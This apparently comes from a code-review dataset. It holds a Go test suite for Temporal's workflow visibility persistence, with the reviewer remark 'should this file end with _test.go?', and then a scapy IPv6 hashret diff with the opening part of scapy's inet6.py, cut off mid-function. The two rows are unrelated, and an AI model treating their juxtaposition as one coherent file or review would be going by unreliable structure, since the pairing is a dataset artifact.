If we did it earlier, s.T() will return nil s.Assertions = require.New(s.T()) } // TearDownSuite implementation func (s *VisibilityPersistenceSuite) TearDownSuite() { s.VisibilityMgr.Close() s.DefaultTestCluster.TearDownTestDatabase() } // TestBasicVisibility test func (s *VisibilityPersistenceSuite) TestBasicVisibility() { testNamespaceUUID := namespace.ID(uuid.New()) workflowExecution := commonpb.WorkflowExecution{ WorkflowId: "visibility-workflow-test", RunId: "fb15e4b5-356f-466d-8c6d-a29223e5c536", } startTime := time.Now().UTC().Add(time.Second * -5) startReq := &manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, } err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(startReq) s.Nil(err0) resp, err1 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime, LatestStartTime: startTime, }) s.Nil(err1) s.Equal(1, len(resp.Executions)) s.assertOpenExecutionEquals(startReq, resp.Executions[0]) closeReq := &manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, CloseTime: time.Now(), HistoryLength: 5, } err2 := s.VisibilityMgr.RecordWorkflowExecutionClosed(closeReq) s.Nil(err2) resp, err3 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime, LatestStartTime: startTime, }) s.Nil(err3) s.Equal(0, len(resp.Executions)) resp, err4 := s.VisibilityMgr.ListClosedWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime, LatestStartTime: time.Now(), }) s.Nil(err4) s.Equal(1, len(resp.Executions)) s.assertClosedExecutionEquals(closeReq, resp.Executions[0]) } // TestBasicVisibilityTimeSkew test func (s *VisibilityPersistenceSuite) TestBasicVisibilityTimeSkew() { testNamespaceUUID := namespace.ID(uuid.New()) workflowExecution := commonpb.WorkflowExecution{ WorkflowId: "visibility-workflow-test-time-skew", RunId: "fb15e4b5-356f-466d-8c6d-a29223e5c536", } startTime := time.Now().UTC() err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.NoError(err0) resp, err1 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime, LatestStartTime: startTime, }) s.NoError(err1) s.Equal(1, len(resp.Executions)) s.Equal(workflowExecution.WorkflowId, resp.Executions[0].Execution.WorkflowId) err2 := s.VisibilityMgr.RecordWorkflowExecutionClosed(&manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, CloseTime: startTime.Add(-10 * time.Millisecond), }) s.NoError(err2) resp, err3 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: 
testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime, LatestStartTime: startTime, }) s.NoError(err3) s.Equal(0, len(resp.Executions)) resp, err4 := s.VisibilityMgr.ListClosedWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime.Add(-10 * time.Millisecond), // This is actually close_time LatestStartTime: startTime.Add(-10 * time.Millisecond), }) s.NoError(err4) s.Equal(1, len(resp.Executions)) } func (s *VisibilityPersistenceSuite) TestBasicVisibilityShortWorkflow() { testNamespaceUUID := namespace.ID(uuid.New()) workflowExecution := commonpb.WorkflowExecution{ WorkflowId: "visibility-workflow-test-short-workflow", RunId: "3c095198-0c33-4136-939a-c29fbbb6a80b", } startTime := time.Now().UTC() err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.NoError(err0) err2 := s.VisibilityMgr.RecordWorkflowExecutionClosed(&manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, CloseTime: startTime.Add(10 * time.Millisecond), }) s.NoError(err2) resp, err3 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime, LatestStartTime: startTime, }) s.NoError(err3) s.Equal(0, len(resp.Executions)) resp, err4 := s.VisibilityMgr.ListClosedWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime.Add(10 * time.Millisecond), // This is actually close_time LatestStartTime: startTime.Add(10 * time.Millisecond), }) s.NoError(err4) s.Equal(1, len(resp.Executions)) } func (s *VisibilityPersistenceSuite) TestVisibilityRetention() { if _, ok := s.DefaultTestCluster.(*cassandra.TestCluster); !ok { return } testNamespaceUUID := namespace.ID(uuid.New()) workflowExecution := commonpb.WorkflowExecution{ WorkflowId: "visibility-workflow-test-visibility-retention", RunId: "3c095198-0c33-4136-939a-c29fbbb6a802", } startTime := time.Now().UTC().Add(-1 * time.Hour) err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.NoError(err0) retention := 1 * time.Second err2 := s.VisibilityMgr.RecordWorkflowExecutionClosed(&manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, CloseTime: startTime.Add(1 * time.Minute), Retention: &retention, }) s.NoError(err2) resp, err3 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime, LatestStartTime: startTime, }) s.NoError(err3) s.Equal(0, len(resp.Executions)) resp, err4 := s.VisibilityMgr.ListClosedWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: 
startTime.Add(1 * time.Minute), // This is actually close_time LatestStartTime: startTime.Add(1 * time.Minute), }) s.NoError(err4) s.Equal(1, len(resp.Executions)) // Sleep for retention to fire. time.Sleep(retention) resp2, err5 := s.VisibilityMgr.ListClosedWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime.Add(1 * time.Minute), // This is actually close_time LatestStartTime: startTime.Add(1 * time.Minute), }) s.NoError(err5) s.Equal(0, len(resp2.Executions)) } // TestVisibilityPagination test func (s *VisibilityPersistenceSuite) TestVisibilityPagination() { testNamespaceUUID := namespace.ID(uuid.New()) // Create 2 executions startTime1 := time.Now().UTC() workflowExecution1 := commonpb.WorkflowExecution{ WorkflowId: "visibility-pagination-test1", RunId: "fb15e4b5-356f-466d-8c6d-a29223e5c536", } startReq1 := &manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution1, WorkflowTypeName: "visibility-workflow", StartTime: startTime1, }, } err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(startReq1) s.Nil(err0) startTime2 := startTime1.Add(time.Second) workflowExecution2 := commonpb.WorkflowExecution{ WorkflowId: "visibility-pagination-test2", RunId: "843f6fc7-102a-4c63-a2d4-7c653b01bf52", } startReq2 := &manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution2, WorkflowTypeName: "visibility-workflow", StartTime: startTime2, }, } err1 := s.VisibilityMgr.RecordWorkflowExecutionStarted(startReq2) s.Nil(err1) // Get the first one resp, err2 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime1, LatestStartTime: startTime2, }) s.Nil(err2) s.Equal(1, len(resp.Executions)) s.assertOpenExecutionEquals(startReq2, resp.Executions[0]) // Use token to get the second one resp, err3 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime1, LatestStartTime: startTime2, NextPageToken: resp.NextPageToken, }) s.Nil(err3) s.Equal(1, len(resp.Executions)) s.assertOpenExecutionEquals(startReq1, resp.Executions[0]) // It is possible to not return non empty token which is going to return empty result if len(resp.NextPageToken) != 0 { // Now should get empty result by using token resp, err4 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime1, LatestStartTime: startTime2, NextPageToken: resp.NextPageToken, }) s.Nil(err4) s.Equal(0, len(resp.Executions)) } } // TestFilteringByType test func (s *VisibilityPersistenceSuite) TestFilteringByType() { testNamespaceUUID := namespace.ID(uuid.New()) startTime := time.Now() // Create 2 executions workflowExecution1 := commonpb.WorkflowExecution{ WorkflowId: "visibility-filtering-test1", RunId: "fb15e4b5-356f-466d-8c6d-a29223e5c536", } err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution1, WorkflowTypeName: "visibility-workflow-1", StartTime: startTime, }, }) s.Nil(err0) workflowExecution2 := 
commonpb.WorkflowExecution{ WorkflowId: "visibility-filtering-test2", RunId: "843f6fc7-102a-4c63-a2d4-7c653b01bf52", } err1 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution2, WorkflowTypeName: "visibility-workflow-2", StartTime: startTime, }, }) s.Nil(err1) // List open with filtering resp, err2 := s.VisibilityMgr.ListOpenWorkflowExecutionsByType(&manager.ListWorkflowExecutionsByTypeRequest{ ListWorkflowExecutionsRequest: &manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 2, EarliestStartTime: startTime, LatestStartTime: startTime, }, WorkflowTypeName: "visibility-workflow-1", }) s.Nil(err2) s.Equal(1, len(resp.Executions)) s.Equal(workflowExecution1.WorkflowId, resp.Executions[0].Execution.WorkflowId) // Close both executions err3 := s.VisibilityMgr.RecordWorkflowExecutionClosed(&manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution1, WorkflowTypeName: "visibility-workflow-1", StartTime: startTime, }, CloseTime: time.Now(), }) s.Nil(err3) closeReq := &manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution2, WorkflowTypeName: "visibility-workflow-2", StartTime: startTime, }, CloseTime: time.Now(), HistoryLength: 3, } err4 := s.VisibilityMgr.RecordWorkflowExecutionClosed(closeReq) s.Nil(err4) // List closed with filtering resp, err5 := s.VisibilityMgr.ListClosedWorkflowExecutionsByType(&manager.ListWorkflowExecutionsByTypeRequest{ ListWorkflowExecutionsRequest: &manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 2, EarliestStartTime: startTime, LatestStartTime: time.Now(), }, WorkflowTypeName: "visibility-workflow-2", }) s.Nil(err5) s.Equal(1, len(resp.Executions)) s.assertClosedExecutionEquals(closeReq, resp.Executions[0]) } // TestFilteringByWorkflowID test func (s *VisibilityPersistenceSuite) TestFilteringByWorkflowID() { testNamespaceUUID := namespace.ID(uuid.New()) startTime := time.Now() // Create 2 executions workflowExecution1 := commonpb.WorkflowExecution{ WorkflowId: "visibility-filtering-test1", RunId: "fb15e4b5-356f-466d-8c6d-a29223e5c536", } err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution1, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.Nil(err0) workflowExecution2 := commonpb.WorkflowExecution{ WorkflowId: "visibility-filtering-test2", RunId: "843f6fc7-102a-4c63-a2d4-7c653b01bf52", } err1 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution2, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.Nil(err1) // List open with filtering resp, err2 := s.VisibilityMgr.ListOpenWorkflowExecutionsByWorkflowID(&manager.ListWorkflowExecutionsByWorkflowIDRequest{ ListWorkflowExecutionsRequest: &manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 2, EarliestStartTime: startTime, LatestStartTime: startTime, }, WorkflowID: "visibility-filtering-test1", }) 
s.Nil(err2) s.Equal(1, len(resp.Executions)) s.Equal(workflowExecution1.WorkflowId, resp.Executions[0].Execution.WorkflowId) // Close both executions err3 := s.VisibilityMgr.RecordWorkflowExecutionClosed(&manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution1, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, CloseTime: time.Now(), }) s.Nil(err3) closeReq := &manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution2, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, CloseTime: time.Now(), HistoryLength: 3, } err4 := s.VisibilityMgr.RecordWorkflowExecutionClosed(closeReq) s.Nil(err4) // List closed with filtering resp, err5 := s.VisibilityMgr.ListClosedWorkflowExecutionsByWorkflowID(&manager.ListWorkflowExecutionsByWorkflowIDRequest{ ListWorkflowExecutionsRequest: &manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 2, EarliestStartTime: startTime, LatestStartTime: time.Now(), }, WorkflowID: "visibility-filtering-test2", }) s.Nil(err5) s.Equal(1, len(resp.Executions)) s.assertClosedExecutionEquals(closeReq, resp.Executions[0]) } // TestFilteringByStatus test func (s *VisibilityPersistenceSuite) TestFilteringByStatus() { testNamespaceUUID := namespace.ID(uuid.New()) startTime := time.Now() // Create 2 executions workflowExecution1 := commonpb.WorkflowExecution{ WorkflowId: "visibility-filtering-test1", RunId: "fb15e4b5-356f-466d-8c6d-a29223e5c536", } err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution1, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.Nil(err0) workflowExecution2 := commonpb.WorkflowExecution{ WorkflowId: "visibility-filtering-test2", RunId: "843f6fc7-102a-4c63-a2d4-7c653b01bf52", } err1 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution2, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.Nil(err1) // Close both executions with different status err2 := s.VisibilityMgr.RecordWorkflowExecutionClosed(&manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution1, WorkflowTypeName: "visibility-workflow", StartTime: startTime, Status: enumspb.WORKFLOW_EXECUTION_STATUS_COMPLETED, }, CloseTime: time.Now(), }) s.Nil(err2) closeReq := &manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution2, WorkflowTypeName: "visibility-workflow", StartTime: startTime, Status: enumspb.WORKFLOW_EXECUTION_STATUS_FAILED, }, CloseTime: time.Now(), HistoryLength: 3, } err3 := s.VisibilityMgr.RecordWorkflowExecutionClosed(closeReq) s.Nil(err3) // List closed with filtering resp, err4 := s.VisibilityMgr.ListClosedWorkflowExecutionsByStatus(&manager.ListClosedWorkflowExecutionsByStatusRequest{ ListWorkflowExecutionsRequest: &manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 2, EarliestStartTime: startTime, LatestStartTime: time.Now(), }, 
Status: enumspb.WORKFLOW_EXECUTION_STATUS_FAILED, }) s.Nil(err4) s.Equal(1, len(resp.Executions)) s.assertClosedExecutionEquals(closeReq, resp.Executions[0]) } // TestDelete test func (s *VisibilityPersistenceSuite) TestDelete() { if s.VisibilityMgr.GetName() == "cassandra" { // This test is not applicable for cassandra. return } nRows := 5 testNamespaceUUID := namespace.ID(uuid.New()) startTime := time.Now().UTC().Add(time.Second * -5) for i := 0; i < nRows; i++ { workflowExecution := commonpb.WorkflowExecution{ WorkflowId: uuid.New(), RunId: uuid.New(), } err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.Nil(err0) closeReq := &manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, Status: enumspb.WORKFLOW_EXECUTION_STATUS_FAILED, }, CloseTime: time.Now(), HistoryLength: 3, } err1 := s.VisibilityMgr.RecordWorkflowExecutionClosed(closeReq) s.Nil(err1) } resp, err3 := s.VisibilityMgr.ListClosedWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, EarliestStartTime: startTime, LatestStartTime: time.Now(), PageSize: 10, }) s.Nil(err3) s.Equal(nRows, len(resp.Executions)) remaining := nRows for _, row := range resp.Executions { err4 := s.VisibilityMgr.DeleteWorkflowExecution(&manager.VisibilityDeleteWorkflowExecutionRequest{ NamespaceID: testNamespaceUUID, RunID: row.GetExecution().GetRunId(), }) s.Nil(err4) remaining-- resp, err5 := s.VisibilityMgr.ListClosedWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, EarliestStartTime: startTime, LatestStartTime: time.Now(), PageSize: 10, }) s.Nil(err5) s.Equal(remaining, len(resp.Executions)) } } // TestUpsertWorkflowExecution test func (s *VisibilityPersistenceSuite) TestUpsertWorkflowExecution() { tests := []struct { request *manager.UpsertWorkflowExecutionRequest expected error }{ { request: &manager.UpsertWorkflowExecutionRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: "", Namespace: "", Execution: commonpb.WorkflowExecution{}, WorkflowTypeName: "", StartTime: time.Time{}, ExecutionTime: time.Time{}, TaskID: 0, Memo: nil, SearchAttributes: &commonpb.SearchAttributes{ IndexedFields: map[string]*commonpb.Payload{ searchattribute.TemporalChangeVersion: payload.EncodeBytes([]byte("dummy")), }, }, Status: enumspb.WORKFLOW_EXECUTION_STATUS_RUNNING, }, }, expected: nil, }, { request: &manager.UpsertWorkflowExecutionRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: "", Namespace: "", Execution: commonpb.WorkflowExecution{}, WorkflowTypeName: "", StartTime: time.Time{}, ExecutionTime: time.Time{}, TaskID: 0, Memo: nil, SearchAttributes: nil, Status: enumspb.WORKFLOW_EXECUTION_STATUS_RUNNING, }, }, // To avoid blocking the task queue processors on non-ElasticSearch visibility stores // we simply treat any attempts to perform Upserts as "no-ops" // Attempts to Scan, Count or List will still fail for non-ES stores. 
expected: nil, }, } for _, test := range tests { s.Equal(test.expected, s.VisibilityMgr.UpsertWorkflowExecution(test.request)) } } func (s *VisibilityPersistenceSuite) assertClosedExecutionEquals( req *manager.RecordWorkflowExecutionClosedRequest, resp *workflowpb.WorkflowExecutionInfo) { s.Equal(req.Execution.RunId, resp.Execution.RunId) s.Equal(req.Execution.WorkflowId, resp.Execution.WorkflowId) s.Equal(req.WorkflowTypeName, resp.GetType().GetName()) s.Equal(persistence.UnixMilliseconds(req.StartTime), persistence.UnixMilliseconds(timestamp.TimeValue(resp.GetStartTime()))) s.Equal(persistence.UnixMilliseconds(req.CloseTime), persistence.UnixMilliseconds(timestamp.TimeValue(resp.GetCloseTime()))) s.Equal(req.Status, resp.GetStatus()) s.Equal(req.HistoryLength, resp.HistoryLength) } func (s *VisibilityPersistenceSuite) assertOpenExecutionEquals( req *manager.RecordWorkflowExecutionStartedRequest, resp *workflowpb.WorkflowExecutionInfo) { s.Equal(req.Execution.GetRunId(), resp.Execution.GetRunId()) s.Equal(req.Execution.WorkflowId, resp.Execution.WorkflowId) s.Equal(req.WorkflowTypeName, resp.GetType().GetName()) s.Equal(persistence.UnixMilliseconds(req.StartTime), persistence.UnixMilliseconds(timestamp.TimeValue(resp.GetStartTime()))) s.Nil(resp.CloseTime) s.Equal(resp.Status, enumspb.WORKFLOW_EXECUTION_STATUS_RUNNING) s.Zero(resp.HistoryLength) }
1
13,365
should this file end with _test.go?
temporalio-temporal
go
@@ -382,7 +382,7 @@ class IPv6(_IPv6GuessPayload, Packet, IPTools):
         if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
             sd = inet_pton(socket.AF_INET6, sd)
-            ss = inet_pton(socket.AF_INET6, self.src)
+            ss = inet_pton(socket.AF_INET6, ss)
             return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()  # noqa: E501
         else:
             return struct.pack("B", nh) + self.payload.hashret()
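For context on the hunk above: in IPv6.hashret() the Home Address Option branch has already set ss to the HAO home address, but the removed line recomputed ss from self.src and silently discarded that value; the added line keeps the HAO-derived ss. A minimal sketch of a packet that reaches this branch, assuming scapy is importable (the addresses and the id/seq values are made up for illustration, they are not taken from the patch):

from scapy.layers.inet6 import IPv6, IPv6ExtHdrDestOpt, HAO, ICMPv6EchoRequest

# An Echo Request carried behind a Destination Options header with a
# Home Address Option (HAO), as a Mobile IPv6 node away from home would send.
pkt = (IPv6(src="2001:db8::10", dst="2001:db8::1")
       / IPv6ExtHdrDestOpt(options=[HAO(hoa="2001:db8::aaaa")])
       / ICMPv6EchoRequest(id=1, seq=1))

# scapy's request/reply matching (sr() and friends) buckets packets by
# hashret(); with the patched line the hash is derived from the HAO home
# address (2001:db8::aaaa) instead of the outer source address (2001:db8::10).
print(pkt.hashret().hex())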
1
############################################################################# # # # inet6.py --- IPv6 support for Scapy # # see http://natisbad.org/IPv6/ # # for more information # # # # Copyright (C) 2005 Guillaume Valadon <[email protected]> # # Arnaud Ebalard <[email protected]> # # # # This program is free software; you can redistribute it and/or modify it # # under the terms of the GNU General Public License version 2 as # # published by the Free Software Foundation. # # # # This program is distributed in the hope that it will be useful, but # # WITHOUT ANY WARRANTY; without even the implied warranty of # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # # General Public License for more details. # # # ############################################################################# """ IPv6 (Internet Protocol v6). """ from __future__ import absolute_import from __future__ import print_function from hashlib import md5 import random import socket import struct from time import gmtime, strftime from scapy.arch import get_if_hwaddr from scapy.as_resolvers import AS_resolver_riswhois from scapy.base_classes import Gen from scapy.compat import chb, orb, raw, plain_str, bytes_encode from scapy.config import conf import scapy.consts from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \ MTU from scapy.error import warning from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ DestIP6Field, FieldLenField, FlagsField, IntField, IP6Field, \ LongField, MACField, PacketLenField, PacketListField, ShortEnumField, \ ShortField, SourceIP6Field, StrField, StrFixedLenField, StrLenField, \ X3BytesField, XBitField, XIntField, XShortField from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \ UDP, UDPerror from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP import scapy.modules.six as six from scapy.packet import bind_layers, Packet, Raw from scapy.sendrecv import sendp, sniff, sr, srp1 from scapy.supersocket import SuperSocket, L3RawSocket from scapy.utils import checksum, strxor from scapy.pton_ntop import inet_pton, inet_ntop from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \ in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \ in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo from scapy.volatile import RandInt, RandShort if not socket.has_ipv6: raise socket.error("can't use AF_INET6, IPv6 is disabled") if not hasattr(socket, "IPPROTO_IPV6"): # Workaround for http://bugs.python.org/issue6926 socket.IPPROTO_IPV6 = 41 if not hasattr(socket, "IPPROTO_IPIP"): # Workaround for https://bitbucket.org/secdev/scapy/issue/5119 socket.IPPROTO_IPIP = 4 if conf.route6 is None: # unused import, only to initialize conf.route6 import scapy.route6 ########################## # Neighbor cache stuff # ########################## conf.netcache.new_cache("in6_neighbor", 120) @conf.commands.register def neighsol(addr, src, iface, timeout=1, chainCC=0): """Sends and receive an ICMPv6 Neighbor Solicitation message This function sends an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with specified IPv6 address address. 'src' address is used as source of the message. Message is sent on iface. By default, timeout waiting for an answer is 1 second. If no answer is gathered, None is returned. Else, the answer is returned (ethernet frame). 
""" nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr)) d = inet_ntop(socket.AF_INET6, nsma) dm = in6_getnsmac(nsma) p = Ether(dst=dm) / IPv6(dst=d, src=src, hlim=255) p /= ICMPv6ND_NS(tgt=addr) p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface)) res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0, chainCC=chainCC) return res @conf.commands.register def getmacbyip6(ip6, chainCC=0): """Returns the MAC address corresponding to an IPv6 address neighborCache.get() method is used on instantiated neighbor cache. Resolution mechanism is described in associated doc string. (chainCC parameter value ends up being passed to sending function used to perform the resolution, if needed) """ if isinstance(ip6, Net6): ip6 = str(ip6) if in6_ismaddr(ip6): # Multicast mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) return mac iff, a, nh = conf.route6.route(ip6) if iff == scapy.consts.LOOPBACK_INTERFACE: return "ff:ff:ff:ff:ff:ff" if nh != '::': ip6 = nh # Found next hop mac = conf.netcache.in6_neighbor.get(ip6) if mac: return mac res = neighsol(ip6, a, iff, chainCC=chainCC) if res is not None: if ICMPv6NDOptDstLLAddr in res: mac = res[ICMPv6NDOptDstLLAddr].lladdr else: mac = res.src conf.netcache.in6_neighbor[ip6] = mac return mac return None ############################################################################# ############################################################################# # IPv6 Class # ############################################################################# ############################################################################# ipv6nh = {0: "Hop-by-Hop Option Header", 4: "IP", 6: "TCP", 17: "UDP", 41: "IPv6", 43: "Routing Header", 44: "Fragment Header", 47: "GRE", 50: "ESP Header", 51: "AH Header", 58: "ICMPv6", 59: "No Next Header", 60: "Destination Option Header", 112: "VRRP", 132: "SCTP", 135: "Mobility Header"} ipv6nhcls = {0: "IPv6ExtHdrHopByHop", 4: "IP", 6: "TCP", 17: "UDP", 43: "IPv6ExtHdrRouting", 44: "IPv6ExtHdrFragment", # 50: "IPv6ExtHrESP", # 51: "IPv6ExtHdrAH", 58: "ICMPv6Unknown", 59: "Raw", 60: "IPv6ExtHdrDestOpt"} class IP6ListField(StrField): __slots__ = ["count_from", "length_from"] islist = 1 def __init__(self, name, default, count_from=None, length_from=None): if default is None: default = [] StrField.__init__(self, name, default) self.count_from = count_from self.length_from = length_from def i2len(self, pkt, i): return 16 * len(i) def i2count(self, pkt, i): if isinstance(i, list): return len(i) return 0 def getfield(self, pkt, s): c = tmp_len = None if self.length_from is not None: tmp_len = self.length_from(pkt) elif self.count_from is not None: c = self.count_from(pkt) lst = [] ret = b"" remain = s if tmp_len is not None: remain, ret = s[:tmp_len], s[tmp_len:] while remain: if c is not None: if c <= 0: break c -= 1 addr = inet_ntop(socket.AF_INET6, remain[:16]) lst.append(addr) remain = remain[16:] return remain + ret, lst def i2m(self, pkt, x): s = b"" for y in x: try: y = inet_pton(socket.AF_INET6, y) except Exception: y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0] y = inet_pton(socket.AF_INET6, y) s += y return s def i2repr(self, pkt, x): s = [] if x is None: return "[]" for y in x: s.append('%s' % y) return "[ %s ]" 